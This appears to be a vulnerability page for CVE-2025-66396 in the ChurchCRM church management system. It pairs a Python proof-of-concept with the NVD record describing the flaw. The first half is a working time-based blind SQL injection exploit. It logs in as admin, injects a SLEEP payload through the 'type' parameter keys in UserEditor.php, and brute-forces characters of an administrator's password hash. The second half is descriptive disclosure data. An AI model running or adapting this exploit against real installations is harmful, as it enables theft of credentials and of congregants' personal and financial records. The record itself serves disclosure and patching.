CVE-2025-66396

import requests import time # CVE-2025-66396 SQL Injection PoC for ChurchCRM # Target: ChurchCRM < 6.5.3 # Location: src/UserEditor.php # Type: Time-based blind SQL injection target_url = "http://target-url/src/UserEditor.php" # Authentication - Requires admin credentials or session login_url = "http://target-url/src/api/authenticate.php" auth_data = { "UserName": "admin", "Password": "admin_password" } session = requests.Session() def login(): response = session.post(login_url, data=auth_data) return "auth_token" in response.text or response.status_code == 200 def extract_data_via_sql_injection(payload): """ Time-based blind SQL injection payload example Extracts database version information """ # Malicious type parameter with SQL injection payload data = { "type": { f"1' AND (SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END) AND '1'='1": "value" }, "Action": "saveSettings", "UserID": "1" } start_time = time.time() response = session.post(target_url, data=data) elapsed = time.time() - start_time return elapsed > 4 # If response took >4 seconds, condition was true def build_boolean_payload(condition): """Build payload for boolean-based blind injection""" # Example: Check if database version contains '5' return f"(SELECT SUBSTRING(@@version,1,1))='{condition}'" def exploit(): if not login(): print("[-] Authentication failed") return print("[+] Logged in successfully") # Time-based blind injection to extract admin password hash # Example: Extract first character of user password payload = "(SELECT SUBSTRING(user_pasword,1,1) FROM user_user WHERE bSecRole=1 LIMIT 1)='a'" # Test different characters for char in 'abcdefghijklmnopqrstuvwxyz0123456789': test_payload = f"(SELECT SUBSTRING(user_pasword,1,1) FROM user_user WHERE bSecRole=1 LIMIT 1)='{char}'" if extract_data_via_sql_injection(test_payload): print(f"[+] Found character: {char}") break if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-66396", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:55.870", "lastModified": "2025-12-18T19:08:03.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/UserEditor.php` file. When an administrator saves a user's configuration settings, the keys of the `type` POST parameter array are not properly sanitized or type-casted before being used in multiple SQL queries. This allows a malicious or compromised administrator account to execute arbitrary SQL commands, including time-based blind SQL injection attacks, to directly interact with the database. The vulnerability is located in `src/UserEditor.php` within the logic that handles saving user-specific configuration settings. The `type` parameter from the POST request is processed as an array. The code iterates through this array and uses `key($type)` to extract the array key, which is expected to be a numeric ID. This key is then assigned to the `$id` variable. The `$id` variable is subsequently concatenated directly into a `SELECT` and an `UPDATE` SQL query without any sanitization or validation, making it an injection vector. Although the vulnerability requires administrator privileges to exploit, it allows a malicious or compromised admin account to execute arbitrary SQL queries. This can be used to bypass any application-level logging or restrictions, directly manipulate the database, exfiltrate, modify, or delete all data (including other user credentials, financial records, and personal information), and could potentially lead to further system compromise, such as writing files to the server, depending on the database's configuration and user privileges. Version 6.5.3 patches the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-whpp-wx64-4qp9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}